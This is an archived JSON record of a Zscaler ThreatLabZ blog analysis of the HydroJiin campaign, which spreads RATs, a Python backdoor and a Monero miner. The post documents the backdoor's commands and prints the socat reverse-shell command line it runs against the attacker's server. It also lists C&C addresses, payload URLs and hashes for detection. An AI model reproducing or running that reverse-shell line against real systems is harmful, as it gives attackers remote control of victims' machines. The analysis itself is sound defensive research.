{
	"id": "1242a645-05a5-4a9f-9a4a-1c122c95768e",
	"created_at": "2026-04-06T00:14:51.2615Z",
	"updated_at": "2026-04-10T03:21:52.510453Z",
	"deleted_at": null,
	"sha1_hash": "a4e2caa2816eb4b829d65f344773f9aa7a75664b",
	"title": "HydroJiin Malware Campaign | ThreatLabZ | Zscaler Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1744363,
	"plain_text": "HydroJiin Malware Campaign | ThreatLabZ | Zscaler Blog\r\nBy Atinderpal Singh, Rohit Chaturvedi, Tarun Dewan\r\nPublished: 2021-04-14 · Archived: 2026-04-05 18:04:38 UTC\r\nZscaler ThreatLabZ recently came across an interesting campaign involving multiple infostealer RAT families and miner\r\nmalware. We’ve dubbed the campaign “HydroJiin” based on aliases used by the threat actor. The threat actor is in the\r\nbusiness of selling malware, and lurks around in online forums that are common hangouts for neophyte to mid-level cyber\r\ncriminals. We speculate that the malware author is running widespread campaigns involving different commodity and\r\ncustom malware to steal information to sell in underground marketplaces.\r\nSimilar to other attacks outlined in the recent ThreatLabZ State of Encrypted Attacks report, this campaign serves as yet\r\nanother example of the importance of continuous SSL inspection and zero trust policies to prevent initial compromise as\r\nwell as communication back to C\u0026C servers. While we do not know the impact of this particular campaign, this type of\r\nmalware is for sale on underground markets to any number of prospective cybercriminals. While not highly sophisticated,\r\nthis campaign uses a number of different techniques in order to increase its chances of successfully infiltrating organizations\r\nthat do not take proper precautions.\r\nThis campaign utilizes a variety of payloads and infection vectors, from commodity RATs to custom malware, email spam,\r\nbackdooring/masquerading as cracked software, and other lures. Listed below are some of the unique aspects of this\r\ncampaign:\r\nMultilevel infection chain of payloads, each leading to the next\r\nCustom Python-based backdoor deployed along with other RATs (NetWired and Quasar)\r\nPython backdoor command checking for MacOS, indicating the possibility of more cross-platform functionality in the\r\nfuture.
\r\nThe campaign is related to a threat actor who is also involved in the distribution of multiple malicious tools via a dedicated\r\nmalware e-commerce website\r\nPossibility of a backdoored malware payload, similar to the CobianRAT case\r\nNot rare, but heavy use of pastebin to host encoded payloads\r\nInfection chain\r\nhttps://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign\r\nPage 1 of 10\n\nFigure 1: Infection Chain\r\nThe infection starts with the delivery of a downloader that downloads multiple payloads. We could not confirm the delivery\r\nvector of this downloader, but we suspect the use of spam emails and cracked software, as we have seen in earlier\r\ncampaigns. Once the attackers achieve initial compromise, the downloader downloads three files:\r\nInjector - Used as a loader to inject downloaded payloads into legitimate processes.\r\nNetwired RAT - A commodity RAT used to control the infected system and steal information.\r\nDownloaderShellcode - Obfuscated Meterpreter-based shellcode that downloads further payloads.\r\nA Pyrome Python backdoor is downloaded by this shellcode. It in turn downloads socat and the xmrig miner,\r\nand finally the xmrig miner downloads another RAT named Quasar.\r\nEach payload and its functionality is explained below.\r\n1 Analysis of downloader payload\r\nFirst, the downloader downloads a payload from pastebin and saves it to the %TEMP% path with a randomly generated name.\r\nThe payload hosted on pastebin is base64 encoded, with the resulting text string reversed.\r\nFigure 2: Downloading encoded payload from pastebin\r\nThe downloaded malware is an injector.
It downloads two more payloads and passes an argument to the first payload for\r\ninjection.\r\nFigure 3: Passing payloads to injector\r\nPayloads are then downloaded from:\r\nxmr-services[.]com/C/ABAGFBBEBDBCDBFCAEGBEEBAAB_B__DFECBAGGDEBEFD_EDCCBAEFEE.txt -\r\nShellcode Downloader\r\npastebin[.]com/raw/G0jcGs79 - NetwiredRC\r\nThese payloads are likewise base64 encoded with the string reversed.\r\n1.1 NetWiredRC\r\nThe second payload in this case, hosted on pastebin, is a commodity malware known as NetWiredRC. NetWiredRC is a\r\npublicly available RAT sold by World Wired Labs, active since at least 2012. Adversaries often use spam and phishing\r\nemails to distribute NetWiredRC. In the wild, NetWiredRC has also been seen in use by APT threat actors. NetWiredRC’s\r\nmain focus is to gain unauthorized control of the victim machine, steal stored credentials, and perform keylogging.\r\nThis malware has had multiple version updates with bug fixes and new functionality. This sample communicates with\r\nbeltalus.ns1[.]name:8084 for further commands.\r\nConfiguration extracted from the Netwire RAT:\r\n{'Domains': ['beltalus.ns1[.]name:8084'], 'Proxy Server': 'Not Configured', 'Password': b'Volve', 'Host ID': b'Loader-%Rand%', 'Mutex': b'mKsWHTbK', 'Install Path': b'-', 'Startup Name': b'-', 'ActiveX Key': b'-', 'KeyLog Dir': b'%AppData%\\\\Logs_temp\\\\', 'Proxy Option': 'Direct connection', 'Copy executable': False, 'Delete original': False, 'Lock executable': False, 'Registry autorun': False, 'ActiveX autorun': False, 'Use a mutex': True, 'Offline keylogger': True}\r\n1.2 Shellcode Downloader\r\nThe first of the two downloaded payloads is shellcode encoded with the Metasploit Shikata Ga Nai encoder, capable of\r\ndownloading another payload from r3clama[.]com/files/chrome.exe.
\r\nPDB path embedded inside the binary: C:\\local0\\asf\\release\\build-2.2.14\\support\\Release\\ab.pdb\r\nThe shellcode downloader downloads the following payloads:\r\nr3clama[.]com/files/socat.zip : Socat tool\r\nr3clama[.]com/files/services.exe : Miner Dropper\r\n1.2.1 PyInstaller Payload\r\nThe payload downloaded from r3clama[.]com is Python-based malware bundled using PyInstaller. Capabilities of this\r\npayload include:\r\nPersistence using a Run key.\r\nDownload, save and extract socat.zip from https://r3clama[.]com/files/socat.zip.\r\nDownload the Monero miner executable from https://r3clama[.]com/files/services.exe, which runs and further downloads\r\nQuasarRAT.\r\nStart the network communication thread.\r\nFigure 4: Configuration settings of malware\r\nNetwork Communication\r\nThe malware next communicates with the C\u0026C server at IP '193.218.118[.]190' and port 8266, first by sending a key to the\r\nserver and then waiting for JSON commands. Commands supported by this malware include:\r\nw0rm\r\nurl\r\nupload\r\nFigure 5: Commands supported by the Python backdoor\r\nCommands 'url' and 'upload'\r\nBoth the url and upload commands are supported only on Windows; on any other platform these commands are ignored.\r\nThe two commands are nearly identical: each downloads a payload from the specified URL and saves it. Files are saved\r\nunder a newly created directory under %temp% with 16-character random names. There are only two differences:\r\n1. In the case of upload, the downloaded file is saved under %temp%/upload, and in the case of url the file is saved under\r\n%temp%/userbin.\r\n2. The url command also executes the file in addition to downloading it, while the upload command does not.\r\nCommand 'w0rm'\r\nThe w0rm command is supported on two platforms - Windows and MacOS.
On receipt of this command, socat runs with the\r\nfollowing command line:\r\n\"socat OPENSSL:193[.]218[.]118[.]190:4442,verify=0 EXEC:{OS Command}\"\r\nOS Command\r\nWindows : 'cmd.exe',pipes\r\nMacOS : /bin/bash\r\nThe backdoor then sends hostname+’$\u003e’ back to the C\u0026C over the socket.\r\nIn short, this command provides the attacker with a reverse shell on the system through socat.\r\n1.2.1.1 Socat\r\nSocat is an advanced multipurpose data relay tool. It supports a plethora of protocols. Below is the description from its\r\ncreators:\r\n“socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a\r\nfile, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy\r\nCONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of\r\nthese. These modes include generation of \"listening\" sockets, named pipes, and pseudo terminals.” - README\r\n1.2.1.2 Miner Dropper\r\nThis is again .NET-based malware. It includes a Monero miner binary and all the DLL dependencies required by the Monero\r\nminer executable. It drops and runs the miner payload.
Then it downloads and runs an additional payload, again from\r\npastebin.\r\nHere is the Miner Dropper sequence:\r\nInstalls the miner executable and dependency files.\r\nFigure 6: Installing xmrig miner dependency files\r\nWaits for the system to become idle before starting the miner.\r\nFigure 7: Checks if system is idle before starting miner\r\nCheckActive checks whether the miner process is already running; if not, it is started by StartFiles.\r\nFigure 8: Running miner executable with required arguments\r\nDownloads the Quasar RAT payload from https://pastebin[.]com/raw/khzLqKyN after starting the miner:\r\nFigure 9: Downloading another payload (QuasarRAT)\r\nThis miner could be the MinerGate Silent Miner sold on the threat actor’s malware shop. If our assumption is true, there is\r\nalso the possibility that the miner is backdoored, similar to the old Cobian RAT case, piggybacking on client malware\r\noperators to distribute the actor’s own RATs. Unfortunately, it is not possible to verify this assumption without access to the builder.\r\n1.2.1.2.1 QuasarRAT\r\nQuasarRAT has been active since at least 2015. Quasar is an open-source project written for the .NET Framework and freely\r\navailable to the public. This means anyone can take the code and use it freely, with or without modification. Hence, this\r\nmalware has become quite popular among cyber criminals. It has been used in various campaigns, from mass spam\r\ncampaigns to targeted attacks. The sample used in this campaign was version 1.3, which has been used in a number of past\r\ncampaigns.\r\nConfiguration of QuasarRAT\r\nVersion: \"1.3.0.0\"\r\nC\u0026C : \"beltalus.ns1[.]name:8082;\"\r\nFilename: \"Client.exe\"\r\nMutex: \"QSR_MUTEX_NJPXiF1GKqO6Y3uwjn\"\r\nThe C\u0026C address used to control the Python backdoor and socat reverse shell is historically known to host C\u0026C servers for\r\nmany other malware families.
Here is a list of some malware families and the corresponding ports used to host C\u0026C servers in the past:\r\nIP Port Malware\r\n193.218.118.190 8266 Python backdoor\r\n193.218.118.190 4442 Socat listener OPENSSL\r\n193.218.118.190 1111 NjRAT\r\n193.218.118.190 2407 QuasarRAT\r\n193.218.118.190 8050 Nanocore\r\nThreat Actor HydroJiin\r\nWe believe this campaign is run by a threat actor known by the aliases ‘Hydro’ and ‘JiiN’. The threat actor has been active on\r\nforums such as hackforums[.]net since 2010 and on YouTube since at least 2007. Initially the actor was involved with game\r\nmods and cracks, and eventually moved into the malware space. We believe with high confidence that this actor is from a\r\nFrench-speaking region.\r\nUnder the other alias, JiiN, the threat actor runs a malware shop called JiiN shop at “xmr-services[.]com”. Based on the two\r\naliases, we are calling this campaign and actor HydroJiin.\r\nWe are attributing this campaign to HydroJiin with high confidence for the following reasons:\r\nJiiN shop (Xmr-services) is used in this campaign.\r\nJiiN shop (Xmr-services) sells malware tools which Hydro makes videos about.\r\nThis campaign downloads an encrypted payload from a paste by user Hydro59.\r\nAll of the above indicates the relation between HydroJiin, this campaign, and xmr-services.\r\nMalware Shop\r\nThe website called “JiiN shop” is named after the username of the malware developer/seller and hosted at “xmr-services[.]com.” It\r\nis used to advertise and sell different malware products. The threat actor is using https://shoppy[.]gg for handling\r\ncryptocurrency payments. He is also selling some additional items on shoppy.\r\nFigure 10: JiiN Shop\r\nMalware sold on this website includes:\r\nMinergate silent miner - A configurable miner tool to mine multiple cryptocurrencies on CPU or GPU, hidden from\r\nthe user.
Comes with a builder with options for obfuscation, persistence, etc.\r\nCoak Crypter - As the name implies, a packer tool to obfuscate other malware to make it undetectable.\r\nNiiJ Stealer - A very basic stealer that steals passwords from popular tools like Firefox, Opera, Chrome, FileZilla, etc.\r\nand sends them to the C\u0026C panel.\r\nINK Exploit - Claims to make malware FUD, but provides no details about the specific exploit.\r\nThe Campaign\r\nThe infection cycle and malware payloads discussed above are just a part of an ongoing campaign. The campaign has been\r\ngoing on since at least September 29th, 2020. The source website for this campaign is also serving other payloads, which\r\nled us to more domains and payloads. Covering the whole campaign is out of scope for this blog post, but we are providing\r\nsome details we have noticed, and a non-exhaustive list of malicious websites serving malware and C\u0026C domains is also\r\nincluded in the IoC section.\r\nMost of the domains as well as the served file names follow a pattern. Domains are mostly registered through Namecheap.\r\nDomain Pattern:\r\n[a-z]{4,8}\\d{2,4}[a-z]{0,2}.xyz\r\nE.g.\r\npzazmrserv194[.]xyz\r\nmpzskdfadvert329[.]xyz\r\nhklkxadvert475[.]xyz\r\nZgkstarserver17km[.]xyz\r\nFilename pattern example Malware Family\r\natx111.exe SmokeLoader\r\nsocks111.exe SystemBC\r\ntau111.exe Tauras Stealer\r\nlkx111 Roger Ransomware\r\nlb777 Lockbit ransomware\r\nvoid.exe Downloader\r\ndesk Anydesk\r\nConclusion\r\nThe threat actor HydroJiin has been in the malware business for some time now. He is selling multiple malware types along\r\nwith running his own campaigns. The malware payload download stats from pastebin indicate he is having decent success.\r\nThis actor might not be highly advanced, but he is persistent in his efforts, using various tools, techniques, and methods to\r\nincrease his chances of success.
SSL inspection is advisable to detect and block such threats, which use SSL to hide their\r\nmalicious intent. We at Zscaler ThreatLabZ continue to monitor, and strive to protect our customers from, all levels of\r\nthreats.\r\nDetection\r\nFigure 11: Zscaler Cloud sandbox report flagging malware\r\nIn addition to sandbox detections, the Zscaler Cloud Security Platform detects indicators at various levels:\r\nWin32.Backdoor.NetWiredRC\r\nWin32.Downloader.NetWiredRC\r\nWin32.Backdoor.QuasarRAT\r\nWin32.Coinminer.Xmrig\r\nWin32.Downloader.MiniInject\r\nWin32.Downloader.Pyrome\r\nMITRE ATT\u0026CK\r\nID Technique - Use in this campaign\r\nT1059 Command and Scripting Interpreter: Windows Command Shell - Execute reverse shell commands\r\nT1555 Credentials from Password Stores - Mentioned RAT functionality\r\nT1573 Encrypted Channel: Symmetric Cryptography - Encrypt the communication between the victim and the remote machine\r\nT1105 Ingress Tool Transfer - Downloads the Miner and RAT on the victim machine\r\nT1056 Input Capture: Keylogging - Mentioned RAT functionality\r\nT1112 Modify Registry - Modify Run entry in registry\r\nT1090 Proxy - Quasar uses SOCKS5 to communicate over a reverse proxy\r\nT1021 Remote Services: Remote Desktop Protocol - Quasar module to perform remote desktop access\r\nT1053 Scheduled Task/Job: Scheduled Task - Establish persistence by creating new schtasks\r\nT1082 System Information Discovery - Quasar and NetWire both have this feature to discover and collect victim machine information\r\nT1125 Video Capture - Mentioned RAT functionality\r\nT1113 Screen Capture - Mentioned RAT functionality\r\nT1132 Data Encoding - Downloaded Base64 encoded file\r\nT1496 Resource Hijacking - Install XMRig Miner on victim machine\r\nT1027 Obfuscated Files or Information - XOR operation is implemented to decrypt the file\r\nIOCs\r\nFilename Md5 Malware\r\nVoid.exe [parent 
file] 656951fa7b57355b58075b3c06232b01 Win3\r\nABAGFBBEBDBCDBFCAEGBEEBAAB_B__DFECBAGGDEBEFD_EDCCBAEFEE.txt 9c50501b6f68921cafed8af6f6688fed Win3\r\nchrome.exe 294fd63ebaae4d2e8c741003776488c2 Win3\r\nService.exe e9bccc96597cc96d22b85010d7fa3004 Win3\r\nkhzLqKyN 3bb3340bccdab8cde94dd1bf105e1d3e Win3\r\nG0jcGs79 F094D8C0D9E6766BCCF78DA49AAB3CBC Win3\r\nURLs Malware\r\ngzlkmcserv437[.]xyz/void.exe Win32.Downloader.MiniInject\r\nr3clama[.]com/files/socat.zip Socat tool\r\nr3clama[.]com/files/services.exe Win32.Coinminer.Xmrig\r\npastebin[.]com/raw/khzlqkyn Win32.Backdoor.QuasarRAT\r\npastebin[.]com/raw/G0jcGs79 Win32.Backdoor.NetWiredRC\r\nC\u0026C:\r\nC\u0026C Malware\r\nbeltalus.ns1[.]name:8084 NetWiredRC\r\n82.65.58[.]129 NetWiredRC\r\nxmr.pool.minergate[.]com XMRIG Miner\r\nbeltalus.ns1[.]name:8082 QuasarRAT\r\n193.218.118[.]190:8266 Pyrome backdoor\r\n193.218.118[.]190:4442 Socat\r\n193.218.118[.]190:8266 Python backdoor\r\n193.218.118[.]190:4442 Socat listener OPENSSL\r\n193.218.118[.]190:1111 NjRAT\r\n193.218.118[.]190:2407 QuasarRAT\r\n193.218.118[.]190:8050 Nanocore\r\nSource: https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign"
	],
	"report_names": [
		"look-hydrojiin-campaign"
	],
	"threat_actors": [],
	"ts_created_at": 1775434491,
	"ts_updated_at": 1775791312,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a4e2caa2816eb4b829d65f344773f9aa7a75664b.pdf",
		"text": "https://archive.orkl.eu/a4e2caa2816eb4b829d65f344773f9aa7a75664b.txt",
		"img": "https://archive.orkl.eu/a4e2caa2816eb4b829d65f344773f9aa7a75664b.jpg"
	}
}